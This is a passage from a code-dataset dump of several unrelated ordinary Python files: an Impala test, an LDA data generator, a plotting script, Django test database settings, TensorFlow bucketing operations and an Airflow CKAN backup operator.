assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'addresses', 'key'),\n ('key', '`default`.`customers`.`addresses`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'addresses', 'value/street_1/'),\n ('street_1', '`default`.`customers`.`addresses`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'orders', 'item/order_date'),\n ('order_date', '`default`.`customers`.`orders`'))\n assert_equal(ImpalaDbms.get_nested_select('default', 'customers', 'orders', 'item/items/item/product_id'),\n ('product_id', '`default`.`customers`.`orders`.`items`'))\n"} {"ext": "py", "sha": "1a2ed0f63f2195f08946f3130775ae4a141631b0", "content": "# vim: set encoding=utf-8\n\n# Copyright (c) 2016 Intel Corporation \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#       http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport random\nimport math\n\ndef concat(list):\n return reduce(lambda l, c: l+c, list, [])\n\ndef makedata(topic_count, word_count, paper_count, common_words, number_topics_paper=1, word_count_min=1, word_count_max=20, common_word_count_min=10, common_word_count_max=100):\n\n # generate topic specific words\n # res :: [[[(string, string, string, string)]]]\n with open(\"lda_big.csv\", \"w\", 10**9) as f:\n for paper in range(paper_count):\n for topicval in [random.randint(1, topic_count) for _ in range(number_topics_paper)]:\n for word in range(word_count):\n f.write(','.join((\"paper-\"+str(paper),\"word-\"+str(word)+str(topicval), str(random.randint(word_count_min,word_count_max)), str(topicval), \"\\n\")))\n\n # generate general words\n # res2 :: [[(string, string, string, string)]]\n for paper in range(paper_count):\n for word in range(common_words):\n f.write(','.join((\"paper-\"+str(paper),\"word-\"+str(word), str(int(math.ceil(random.uniform(common_word_count_min, common_word_count_max)))), \"-1\", \"\\n\")))\n \n\nif __name__ == '__main__':\n makedata(10000, 1000, 20000, 100000)\n"} {"ext": "py", "sha": "1a2ed1b0af58417fbaec840751451fe72805fac0", "content": "#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n#\nfrom .misc import *\n"} {"ext": "py", "sha": "1a2ed1d24a934ad713b86596821a24ca5ddd831a", "content": "#!/usr/bin/env python3\n##############################################################################\n# EVOLIFE http://evolife.telecom-paris.fr Jean-Louis Dessalles #\n# Telecom Paris 2021 www.dessalles.fr #\n# -------------------------------------------------------------------------- #\n# License: Creative Commons BY-NC-SA #\n##############################################################################\n\n##############################################################################\n# Draw curves offline using matplotlib #\n##############################################################################\n\n\"\"\" Draw curves offline.\n\tTakes a csv file as input and draws curves.\n\tCreates image file.\n\"\"\"\n\n\nimport sys\nimport os\nimport re\nimport glob\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\t# to use offline\nimport matplotlib.pyplot as plt\n\n\nimport logging\t# for tracing\n# modifying print priority of console handler\nlogging.basicConfig(level='WARNING')\n\nsys.path.append('..')\nsys.path.append('../..')\nsys.path.append('../../..')\nsys.path.append('../../../..')\nimport Evolife.Scenarii.Parameters as EP\n\n\ntry:\timport TableCsv as CSV\nexcept ImportError:\timport Evolife.Tools.TableCsv as CSV\n\n\ndef figsave(FileName):\n\tif os.path.exists(FileName):\tos.remove(FileName)\n\tplt.savefig(FileName)\n\tprint(\"%s created\" % FileName)\n\ndef str2nb(x):\t\n\ttry: return int(x)\n\texcept ValueError:\treturn float(x)\n\t\n\t\n\t\n\"\"\"\n\t\nplt.plot(*zip(*Maxima), c='k', linewidth=1, marker='o')\t\n\t\n\nplt.clf()\nplt.scatter(alphaValues, [p[1] for p in Prices], color=colours, s=44)\nplt.plot(alphaValues, [p[1] for p in Prices], 'r', label='Signal prices')\nplt.scatter(alphaValues, [thetaU(a, UC) for a in alphaValues], color=colours, s=44)\n\n\"\"\"\n\nclass Plot:\n\tdef __init__(self, ExpeFile, FieldDraw=True, ConstantConfigFileName=None):\t\n\t\tself.ExpeFile = os.path.splitext(ExpeFile)[0]\n\t\tif self.ExpeFile.endswith('_res'):\t\n\t\t\tself.ExpeFile = self.ExpeFile[:-4]\n\t\t\tSkipFile = True\t# not a data file\n\t\tOutputFile = self.ExpeFile + '.png'\n\t\tif not os.path.exists(OutputFile):\n\t\t\tself.Dirname, self.ExpeName = os.path.split(self.ExpeFile)\n\t\t\tPlotFile = self.ExpeFile + '.csv'\n\t\t\tself.ConfigFileName = self.ExpeFile + '_res.csv'\n\t\t\tself.Cfg = self.RetrieveConfig(self.ConfigFileName)\t# retrieve actual parameters from _res file\n\t\t\tself.RelevantParam = self.RelevantConfig(self.ExpeName, ConstantConfigFileName)\t# display parameters \n\t\t\t# drawing curves\n\t\t\tplt.figure(1, figsize=(6 + 6 * FieldDraw, 4))\n\t\t\tif FieldDraw:\tplt.subplot(1,2,1)\n\t\t\tymax = self.Draw_Curve(PlotFile)\n\t\t\tif self.RelevantParam:\tplt.title(' '.join(sorted(['%s = %s' % (P, self.RelevantParam[P]) for P in self.RelevantParam])))\n\t\t\tif FieldDraw:\t\n\t\t\t\t# drawing field\n\t\t\t\tplt.subplot(1,2,2)\n\t\t\t\t# self.Draw_Field(self.ExpeFile + '_dmp.csv', ymax=ymax)\n\t\t\t\tself.Draw_Field(self.ExpeFile + '_dmp.csv', ymax=100)\n\t\t\t\tplt.title(self.ExpeFile)\n\t\t\tself.save(OutputFile)\n\t\telse:\tprint('%s already exists' % OutputFile)\n\t\t\t\n\t\t\n\tdef Draw_Curve(self, CurveFileName):\n\t\t# colours = ['#000000', '#00BF00', '#78FF78', '#BF0000', '#FF7878', '#0000BF', '#7878FF']\n\t\tcolours = ['#00BF00', '#78FF78', '#BF0000', '#FF7878', '#0000BF', '#7878FF']\n\t\t# Retrieving coordinates\n\t\tPlotOrders = CSV.load(CurveFileName, sniff=True)\t# loading csv file\n\t\t# Retrieving legend\n\t\ttry:\tLegend = next(PlotOrders)\t\t# reading first line with curve names\n\t\texcept StopIteration:\tsys.exit(0)\n\t\t# Retrieving data\n\t\tData = list(zip(*PlotOrders))\n\t\tData = list(map(lambda L: list(map(str2nb, L)), Data))\n\t\t# Data = list(map(lambda L: list(map(str2nb, L)), [*PlotOrders]))\n\t\tfor Col in range(1,len(Data)):\n\t\t\tplt.plot(Data[0], Data[Col], linewidth=2, color=colours[Col-1], label=Legend[Col])\t\n\t\tx1,x2,y1,y2 = plt.axis()\n\t\tplt.axis((x1, x2, 0, y2+0.05))\n\t\t# plt.ylim(top=100)\n\t\tplt.xlabel('year')\n\t\t# plt.ylabel('price or sales')\n\t\t# plt.legend(bbox_to_anchor=(0.1, 1))\n\t\tplt.legend(loc='upper right')\n\t\treturn plt.ylim()[1]\t# max coordinate\n\t\t\n\t@classmethod\n\tdef RetrieveConfig(self, ConfigFile):\n\t\t\" Retrieves parameters from _res file \"\n\t\tif os.path.exists(ConfigFile):\n\t\t\tCfgLines = open(ConfigFile).readlines()\n\t\t\t# reading parameters\n\t\t\tSep = max([';', '\\t', ','], key=lambda x: CfgLines[0].count(x))\n\t\t\tif len(CfgLines) > 1:\n\t\t\t\tParameters = dict(zip(*map(lambda x: x.strip().split(Sep), CfgLines[:2])))\n\t\t\t\treturn EP.Parameters(ParamDict=Parameters)\n\t\treturn None\n\t\t\n\tdef RelevantConfig(self, ExpeName, ConstantParameterFile):\n\t\t\" Try to find relevant parameters \"\n\t\tIrrelevant = ['BatchMode', 'DisplayPeriod', 'TimeLimit', 'DumpStart']\n\t\tif self.Cfg is None or not ConstantParameterFile:\t\n\t\t\tprint('ConfigFile not found')\n\t\t\treturn None\n\t\tRelevantParameters = {}\n\t\tCP = EP.Parameters(ConstantParameterFile)\n\t\t# determining relevant parameters\n\t\tfor p in CP:\n\t\t\tif p in Irrelevant:\tcontinue\n\t\t\tif p in self.Cfg and CP[p] != self.Cfg[p]:\n\t\t\t\t# print(p, RelevantParameters[p], self.Cfg[p])\n\t\t\t\tRelevantParameters[p] = self.Cfg[p]\n\t\t\t\t# CP.addParameter(p, self.Cfg[p])\n\t\tRelevantParameters = EP.Parameters(ParamDict=RelevantParameters)\n\t\tprint(RelevantParameters)\n\t\treturn RelevantParameters\n\t\t\n\tdef Draw_Field(self, DumpFile, ymax=None):\n\t\tif not os.path.exists(DumpFile):\treturn None\n\t\tLines = open(DumpFile).readlines()\n\t\t# reading recorded positions\n\t\tFieldPlot = None\n\t\tif len(Lines) > 1:\n\t\t\tFieldPlot = Lines[1].strip().split(';')[1:]\n\t\t\tNbP = len(FieldPlot)\n\t\t\tplt.scatter(list(range(NbP)), list(map(float, FieldPlot)), s=11)\n\t\t\t# print(FieldPlot)\n\t\t\tif ymax is not None:\n\t\t\t\tplt.ylim(top=ymax)\n\t\t\tplt.xlabel('quality')\n\t\t\tplt.ylabel('signal')\n\t\treturn FieldPlot\n\t\t\n\tdef save(self, OutputFile): figsave(OutputFile)\n\ndef Parse(Args):\n\tFiles = []\n\tConstantConfigFileName = None\n\tif len(Args) < 2:\n\t\t# find last file\n\t\tCsvFiles = glob.glob('___Results/*.csv')\n\t\tif CsvFiles:\n\t\t\tCsvFiles.sort(key=lambda x: os.stat(x).st_mtime)\n\t\t\tFiles = [CsvFiles[-1]]\n\telif len(Args) > 3:\n\t\tprint('''Usage:\t%s []''' % os.path.basename(Args[0]))\n\telse:\n\t\tFiles = glob.glob(Args[1])\n\t\tConstantConfigFileName = Args[2] if (len(Args) == 3) else None\n\tfor Argfile in Files:\n\t\tyield (Argfile, ConstantConfigFileName)\n\t\nif __name__ == \"__main__\":\n\tfor (Argfile, ConstantConfigFileName) in Parse(sys.argv):\n\t\tif Argfile:\n\t\t\tprint(Argfile)\n\t\t\tplot = Plot(Argfile, FieldDraw=True, ConstantConfigFileName=ConstantConfigFileName)\n\t\t\t# print()\n\n__author__ = 'Dessalles'\n"} {"ext": "py", "sha": "1a2ed1edc9f9195a4dab60e84c698275f4b1aa32", "content": "from .settings import *\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n 'db1': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project1'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n 'db2': {\n 'ENGINE': 'tenant_schemas.postgresql_backend',\n 'NAME': os.environ.get('PG_NAME', 'dts_test_project2'),\n 'USER': os.environ.get('PG_USER'),\n 'PASSWORD': os.environ.get('PG_PASSWORD'),\n 'HOST': os.environ.get('PG_HOST'),\n 'PORT': int(os.environ.get('PG_PORT')) if os.environ.get('PG_PORT') else None,\n },\n\n}"} {"ext": "py", "sha": "1a2ed1f5b3c5dda671b90424d004600ad3dfc622", "content": "# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Operations for bucketing data into groups.\n\nThe classes and functions in this module are used to queue up data into\nbuckets conditional on side information (e.g. sequence length).\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nimport numpy as np\n\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import control_flow_ops\nfrom tensorflow.python.ops import data_flow_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.summary import summary\nfrom tensorflow.python.training import input as input_py\nfrom tensorflow.python.training import queue_runner\n\n# pylint: disable=protected-access\n_as_original_type = input_py._as_original_type\n_as_tensor_list = input_py._as_tensor_list\n_restore_sparse_tensors = input_py._restore_sparse_tensors\n_dtypes = input_py._dtypes\n_store_sparse_tensors = input_py._store_sparse_tensors\n_shapes = input_py._shapes\n_which_queue = input_py._which_queue\n\n# pylint: enable=protected-access\n\n\ndef _validate_bucket(tensor_list):\n tensor_list = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)\n if not tensor_list:\n raise ValueError(\"Expected at least one tensor in bucket().\")\n return tensor_list\n\n\ndef bucket(tensors,\n which_bucket,\n batch_size,\n num_buckets,\n num_threads=1,\n capacity=32,\n shapes=None,\n dynamic_pad=False,\n allow_smaller_final_batch=False,\n keep_input=None,\n shared_name=None,\n name=None):\n \"\"\"Lazy bucketing of input tensors according to `which_bucket`.\n\n The argument `tensors` can be a list or a dictionary of tensors.\n The value returned by the function will be of the same type\n as `tensors`.\n\n The tensors entering this function are put into the bucket given by\n `which_bucket`. Each bucket has its own queue. When a bucket contains\n `batch_size` elements, this minibatch is pushed onto a top queue. The\n tensors returned from this function are a the result of dequeueing the\n next minibatch from this top queue.\n\n This function is implemented using several queues. A `QueueRunner` for the\n queues is added to the current `Graph`'s `QUEUE_RUNNER` collection.\n\n As the returned tensors are the result of of a dequeue operation, evaluating\n them will throw a `tf.errors.OutOfRangeError` when the input queue is\n exhausted. If these tensors are feeding another input queue, its queue runner\n will catch this exception, however, if they are used in your main thread\n you are responsible for catching this yourself.\n\n *N.B.:* If `dynamic_pad` is `False`, you must ensure that either\n (i) the `shapes` argument is passed, or (ii) all of the tensors in\n `tensors` must have fully-defined shapes. `ValueError` will be\n raised if neither of these conditions holds.\n\n If `dynamic_pad` is `True`, it is sufficient that the *rank* of the\n tensors is known, but individual dimensions may have shape `None`.\n In this case, for each enqueue the dimensions with value `None`\n may have a variable length; upon dequeue, the output tensors will be padded\n on the right to the maximum shape of the tensors in the current minibatch.\n For numbers, this padding takes value 0. For strings, this padding is\n the empty string. See `PaddingFIFOQueue` for more info.\n\n If `allow_smaller_final_batch` is `True`, a smaller batch value than\n `batch_size` is returned when the queues are closed and there are not enough\n elements to fill the batch, otherwise the pending elements are discarded.\n In addition, all output tensors' static shapes, as accessed via the\n `get_shape()` method will have a 0th `Dimension` value of `None`, and\n operations that depend on fixed batch_size would fail.\n\n Args:\n tensors: The list or dictionary of tensors, representing a single element,\n to bucket. Nested lists are not supported.\n which_bucket: An `int32` scalar Tensor taking a value in `[0, num_buckets)`.\n batch_size: The new batch size pulled from the queue (all queues will have\n the same size). If a list is passed in then each bucket will have a\n different batch_size.\n (python int, int32 scalar or iterable of integers of length num_buckets).\n num_buckets: A python integer, the number of buckets.\n num_threads: An integer. The number of threads enqueuing `tensors`.\n capacity: An integer. The maximum number of minibatches in the top queue,\n and also the maximum number of elements within each bucket.\n shapes: (Optional) The shapes for each example. Defaults to the\n inferred shapes for `tensors`.\n dynamic_pad: Boolean. Allow variable dimensions in input shapes.\n The given dimensions are padded upon dequeue so that tensors within a\n batch have the same shapes.\n allow_smaller_final_batch: (Optional) Boolean. If `True`, allow the final\n batches to be smaller if there are insufficient items left in the queues.\n keep_input: (Optional). A `bool` scalar Tensor. If provided, this tensor\n controls whether the input is added to the queue or not. If it evaluates\n `True`, then `tensors` are added to the bucket; otherwise they are\n dropped. This tensor essentially acts as a filtering mechanism.\n The default behavior is to assume `keep_input=True`.\n shared_name: (Optional). If set, the queues will be shared under the given\n name across multiple sessions.\n name: (Optional) A name for the operations.\n\n Returns:\n A tuple `(bucket, outputs)` where `bucket` is\n a `int32` scalar tensor and `outputs` is a list or\n dictionary of batched outputs corresponding to elements of `tensors`.\n Every step will receive a new bucket of outputs.\n\n Raises:\n ValueError: If the `shapes` are not specified, and cannot be\n inferred from the elements of `tensors` or if batch_size is a sequence\n but it's length != num_buckets.\n \"\"\"\n batch_size_per_bucket = False\n if isinstance(batch_size, (list, tuple)):\n batch_size_per_bucket = True\n if len(batch_size) != num_buckets:\n raise ValueError(\n \"If batch_size is a list it must have num_buckets elements\")\n else:\n batch_size = [batch_size] * num_buckets\n tensor_list = _as_tensor_list(tensors)\n with ops.name_scope(name, \"bucket\", tensor_list) as name:\n tensor_list = _validate_bucket(tensor_list)\n (tensor_list, sparse_info) = _store_sparse_tensors(\n tensor_list, enqueue_many=False, keep_input=constant_op.constant(True))\n\n # Round-trip batch_size to a tensor, and possibly back\n for i, bucket_batch_size in enumerate(batch_size):\n bucket_batch_size = ops.convert_to_tensor(\n bucket_batch_size, dtype=dtypes.int32, name=\"batch_size\")\n static_batch_size = tensor_util.constant_value(bucket_batch_size)\n batch_size[i] = (static_batch_size if static_batch_size is not None else\n bucket_batch_size)\n\n types = _dtypes([tensor_list])\n shapes = _shapes([tensor_list], shapes, enqueue_many=False)\n\n which_bucket = ops.convert_to_tensor(\n which_bucket, dtype=dtypes.int32, name=\"which_bucket\")\n\n queue_creator = _which_queue(dynamic_pad)\n bucket_queues = []\n for i in range(num_buckets):\n shared_name_i = (\"%s_%d\" % (shared_name, i) if shared_name is not None\n else None)\n bucket_queues.append(\n queue_creator(\n capacity=capacity,\n dtypes=types,\n shapes=shapes,\n shared_name=shared_name_i,\n name=\"bucket_queue_%d\" % i))\n\n maybe_static_batch_size = (\n None if (allow_smaller_final_batch or batch_size_per_bucket)\n else static_batch_size)\n\n bucket_shapes = [\n tensor_shape.vector(maybe_static_batch_size).concatenate(s)\n for s in bucket_queues[0].shapes\n ]\n # top_queue is a PaddingFIFOQueue even if the bucket queues are regular FIFO\n # queues because if we use allow_smaller_final_batch, shapes will\n # contain Nones in their first entry; as a result, a regular\n # FIFOQueue would die when being passed shapes that are not fully defined.\n top_queue = data_flow_ops.PaddingFIFOQueue(\n capacity=capacity,\n dtypes=[dtypes.int32] + types,\n shapes=[tensor_shape.scalar()] + bucket_shapes,\n shared_name=shared_name,\n name=\"top_queue\")\n\n def enqueue_which():\n\n def enqueue_single(i):\n return bucket_queues[i].enqueue(tensor_list)\n\n enqueues = [\n control_flow_ops.cond(\n math_ops.equal(which_bucket, i),\n functools.partial(enqueue_single, i), control_flow_ops.no_op)\n for i in range(num_buckets)\n ]\n return control_flow_ops.group(*enqueues, name=\"group_enqueues\")\n\n if keep_input is not None:\n # TODO(ebrevdo): Expand keep_input param to core training\n # methods, and pipe through to _store_sparse_tensors; so\n # that expensive serialization is guarded by keep_input.\n maybe_enqueue = control_flow_ops.cond(keep_input, enqueue_which,\n control_flow_ops.no_op)\n else:\n maybe_enqueue = enqueue_which()\n\n bucket_enqueue_ops = [maybe_enqueue] * num_threads\n\n if allow_smaller_final_batch:\n which_dequeue = lambda q: q.dequeue_up_to\n else:\n which_dequeue = lambda q: q.dequeue_many\n\n enqueues_to_top = [\n top_queue.enqueue(\n [constant_op.constant(i)] + which_dequeue(q)(\n bs, name=\"read_bucket_%d\" % i),\n name=\"enqueue_from_bucket_%d\" % i)\n for i, (q, bs) in enumerate(zip(bucket_queues, batch_size))\n ]\n\n for i, q in enumerate(bucket_queues):\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(\n q, [enqueues_to_top[i]],\n queue_closed_exception_types=(errors.OutOfRangeError,\n errors.CancelledError)))\n queue_runner.add_queue_runner(\n queue_runner.QueueRunner(\n top_queue,\n bucket_enqueue_ops,\n queue_closed_exception_types=(errors.OutOfRangeError,\n errors.CancelledError)))\n\n for q in bucket_queues:\n summary.scalar(\"bucket/%s/size\" % q.name,\n math_ops.cast(top_queue.size(), dtypes.float32))\n summary.scalar(\"bucket/%s/fraction_of_%d_full\" % (top_queue.name, capacity),\n math_ops.cast(top_queue.size(), dtypes.float32) *\n (1. / capacity))\n\n dequeued = top_queue.dequeue(name=\"dequeue_top\")\n which_bucket_dequeued = dequeued[0]\n dequeued = dequeued[1:]\n dequeued = _restore_sparse_tensors(dequeued, sparse_info)\n return (which_bucket_dequeued, _as_original_type(tensors, dequeued))\n\n\ndef bucket_by_sequence_length(input_length,\n tensors,\n batch_size,\n bucket_boundaries,\n num_threads=1,\n capacity=32,\n shapes=None,\n dynamic_pad=False,\n allow_smaller_final_batch=False,\n keep_input=None,\n shared_name=None,\n name=None):\n \"\"\"Lazy bucketing of inputs according to their length.\n\n This method calls `tf.contrib.training.bucket` under the hood, after first\n subdividing the bucket boundaries into separate buckets and identifying which\n bucket the given `input_length` belongs to. See the documentation for\n `which_bucket` for details of the other arguments.\n\n Args:\n input_length: `int32` scalar `Tensor`, the sequence length of tensors.\n tensors: The list or dictionary of tensors, representing a single element,\n to bucket. Nested lists are not supported.\n batch_size: The new batch size pulled from the queue (all queues will have\n the same size). If a list is passed in then each bucket will have a\n different batch_size.\n (python int, int32 scalar or iterable of integers of length num_buckets).\n bucket_boundaries: int list, increasing non-negative numbers.\n The edges of the buckets to use when bucketing tensors. Two extra buckets\n are created, one for `input_length < bucket_boundaries[0]` and\n one for `input_length >= bucket_boundaries[-1]`.\n num_threads: An integer. The number of threads enqueuing `tensors`.\n capacity: An integer. The maximum number of minibatches in the top queue,\n and also the maximum number of elements within each bucket.\n shapes: (Optional) The shapes for each example. Defaults to the\n inferred shapes for `tensors`.\n dynamic_pad: Boolean. Allow variable dimensions in input shapes.\n The given dimensions are padded upon dequeue so that tensors within a\n batch have the same shapes.\n allow_smaller_final_batch: (Optional) Boolean. If `True`, allow the final\n batches to be smaller if there are insufficient items left in the queues.\n keep_input: (Optional). A `bool` scalar Tensor. If provided, this tensor\n controls whether the input is added to the queue or not. If it evaluates\n `True`, then `tensors` are added to the bucket; otherwise they are\n dropped. This tensor essentially acts as a filtering mechanism.\n The default behavior is to assume `keep_input=True`.\n shared_name: (Optional). If set, the queues will be shared under the given\n name across multiple sessions.\n name: (Optional) A name for the operations.\n\n Returns:\n A tuple `(sequence_length, outputs)` where `sequence_length` is\n a 1-D `Tensor` of size `batch_size` and `outputs` is a list or dictionary\n of batched, bucketed, outputs corresponding to elements of `tensors`.\n\n Raises:\n TypeError: if `bucket_boundaries` is not a list of python integers.\n ValueError: if `bucket_boundaries` is empty or contains non-increasing\n values or if batch_size is a list and it's length doesn't equal the number\n of buckets.\n \"\"\"\n tensor_list = _as_tensor_list(tensors)\n if not isinstance(bucket_boundaries, (list, tuple)):\n raise TypeError(\n \"bucket_boundaries must be a list or tuple, but received: %s\" %\n bucket_boundaries)\n if not bucket_boundaries:\n raise ValueError(\"bucket_boundaries must not be empty\")\n for (s, e) in zip(bucket_boundaries[:-1], bucket_boundaries[1:]):\n if not isinstance(s, int) or not isinstance(e, int):\n raise TypeError(\"bucket boundaries must be integers, but saw: %s and %s\" %\n (s, e))\n if s >= e:\n raise ValueError(\n \"Buckets must contain sequential increasing lengths, but saw: \"\n \"%d before %d\" % (s, e))\n\n with ops.name_scope(name, \"bucket_by_sequence_length\",\n [input_length] + tensor_list) as name:\n input_length = ops.convert_to_tensor(\n input_length, dtype=dtypes.int32, name=\"input_length\")\n # Bucketing conditions are:\n # l < b[0]\n # b[0] <= l < b[1]\n # b[1] <= l < b[2]\n # ...\n # b[N-2] <= l < b[N-1]\n # b[N-1] <= l\n # Equivalent to:\n # [-inf, b[0], b[1], ..., b[N-1]] <= l < [b[0], b[1], ..., b[N-1], inf]\n buckets_min = [np.iinfo(np.int32).min] + list(bucket_boundaries)\n buckets_max = list(bucket_boundaries) + [np.iinfo(np.int32).max]\n conditions_c = math_ops.logical_and(\n math_ops.less_equal(buckets_min, input_length),\n math_ops.less(input_length, buckets_max))\n which_bucket = math_ops.reduce_min(array_ops.where(conditions_c))\n which_bucket = math_ops.to_int32(which_bucket)\n\n if shapes is not None:\n shapes = [tensor_shape.scalar()] + shapes\n\n _, dequeued = bucket(\n tensors=[input_length] + tensor_list,\n which_bucket=which_bucket,\n batch_size=batch_size,\n num_buckets=len(bucket_boundaries) + 1,\n num_threads=num_threads,\n capacity=capacity,\n shapes=shapes,\n dynamic_pad=dynamic_pad,\n allow_smaller_final_batch=allow_smaller_final_batch,\n keep_input=keep_input,\n shared_name=shared_name)\n\n return (dequeued[0], _as_original_type(tensors, dequeued[1:]))\n\n\n__all__ = [\"bucket\", \"bucket_by_sequence_length\"]\n"} {"ext": "py", "sha": "1a2ed23e5ff49379e6935d99a53b1dd765e63b5c", "content": "import hashlib\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import List\n\nimport ckanapi\nimport pandas as pd\nfrom airflow.models.baseoperator import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\n\nclass BackupDatastoreResourceOperator(BaseOperator):\n \"\"\"\n Reads datastore resource, creates backup files for fields (json) and records (parquet). Args:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - resource_task_id: task_id that returns resource object (ie. GetOrCreateResourcePackage)\n - dir_task_id: task_id that returns backup directory\n\n\n Returns dictionary containing:\n - fields: json file path containing fields for datastore resource\n - data: parquet file path containing fields for datastore resource\n - columns: number of columns in datastore resource\n - rows: number of rows in datastore_resource\n - resource_id: datastore resource ID\n \"\"\"\n\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_task_id: str,\n dir_task_id: str,\n sort_columns: List[str] = [],\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.dir_task_id = dir_task_id\n self.resource_task_id = resource_task_id\n self.sort_columns = sort_columns\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def _checksum_datastore_response(self, datastore_response):\n data = pd.DataFrame(datastore_response[\"records\"])\n if \"_id\" in data.columns.values:\n data = data.drop(\"_id\", axis=1)\n if len(self.sort_columns) > 0:\n data = data.sort_values(by=self.sort_columns)\n\n data_hash = hashlib.md5()\n data_hash.update(data.to_csv(index=False).encode(\"utf-8\"))\n\n return data_hash.hexdigest()\n\n def _build_dataframe(self, records):\n data = pd.DataFrame(records)\n if \"_id\" in data.columns.values:\n data = data.drop(\"_id\", axis=1)\n\n return data\n\n def _save_fields_json(self, datastore_response, checksum, backups_dir):\n fields_file_path = backups_dir / f\"fields.{checksum}.json\"\n\n if not fields_file_path.exists():\n fields = [f for f in datastore_response[\"fields\"] if f[\"id\"] != \"_id\"]\n with open(fields_file_path, \"w\") as f:\n json.dump(fields, f)\n\n return fields_file_path\n\n def _save_data_parquet(self, datastore_response, checksum, backups_dir, data):\n data_file_path = backups_dir / f\"data.{checksum}.parquet\"\n\n if not data_file_path.exists():\n data.to_parquet(path=data_file_path, engine=\"fastparquet\", compression=None)\n\n return data_file_path\n\n def execute(self, context):\n # get a resource and backup directory via xcom\n ti = context[\"ti\"]\n resource = ti.xcom_pull(task_ids=self.resource_task_id)\n backups_dir = Path(ti.xcom_pull(task_ids=self.dir_task_id))\n\n # get number of records for this datastore resource\n record_count = self.ckan.action.datastore_search(id=resource[\"id\"], limit=0)[\n \"total\"\n ]\n\n # get data from datastore resource\n datastore_response = self.ckan.action.datastore_search(\n id=resource[\"id\"], limit=record_count\n )\n\n # turn data into dataframe\n data = self._build_dataframe(datastore_response[\"records\"])\n checksum = self._checksum_datastore_response(datastore_response)\n\n # return filepath for fields json, data parquet, row/col counts, checksum, and resource_id\n result = {\n \"fields_file_path\": self._save_fields_json(\n datastore_response, checksum, backups_dir\n ),\n \"data_file_path\": self._save_data_parquet(\n datastore_response, checksum, backups_dir, data\n ),\n \"records\": data.shape[0],\n \"columns\": data.shape[1],\n \"resource_id\": datastore_response[\"resource_id\"],\n \"checksum\": checksum,\n }\n\n logging.info(f\"Returning: {result}\")\n\n return 